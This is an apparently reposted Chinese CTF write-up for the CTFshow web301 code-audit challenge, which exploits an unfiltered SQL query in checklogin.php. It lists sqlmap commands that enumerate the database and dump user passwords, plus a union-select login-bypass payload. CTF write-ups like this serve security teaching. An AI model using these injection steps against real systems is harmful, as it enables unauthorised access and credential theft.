【原创】CTFshow—代码审计

admin 2022年12月3日16:27:46评论33 views字数 708阅读2分21秒阅读模式

[huayang]

该来的还是要来

分享个代码审计的工具Seay

链接: https://pan.baidu.com/s/1Bf4CzqN2Dk1NjCpnC2laXA 密码: c99g

web301

【原创】CTFshow—代码审计

下载源码审计看看

【原创】CTFshow—代码审计

我审nm个*****

去看看检测登录的checklogin.php文件

sql语句没有任何过滤

【原创】CTFshow—代码审计

sqlmap跑一下

因为这里看不见注入点

所以就需要用bp抓包引入数据

复制数据保存为test.txt文件

python3 sqlmap.py -r test.txt --dbs
【原创】CTFshow—代码审计
python3 sqlmap.py -r test.txt -D sds --tables --batch
【原创】CTFshow—代码审计
python3 sqlmap.py -r test.txt -D sds -T sds_user  --columns --batch
【原创】CTFshow—代码审计
python3 sqlmap.py -r test.txt -D sds -T sds_user  -C sds_password --dump --batch
【原创】CTFshow—代码审计
python3 sqlmap.py -r test.txt -D sds -T sds_user  -C sds_username --dump --batch
【原创】CTFshow—代码审计
【原创】CTFshow—代码审计

当然也可以直接使用sqlmap表单查询搞下来,只不过时间有点久

python3 sqlmap.py -u http://396c27a6-b4b7-4010-880a-b51531e43147.chall.ctf.show/login.php  --forms --batch --dump
【原创】CTFshow—代码审计

方法二

具体可参照https://hellohy.top/huayang/658.html

【原创】CTFshow—代码审计
userid='union select'1'#&userpwd=1

[/huayang]

FROM:浅浅淡淡[hellohy]

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月3日16:27:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【原创】CTFshow—代码审计https://cn-sec.com/archives/1443033.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息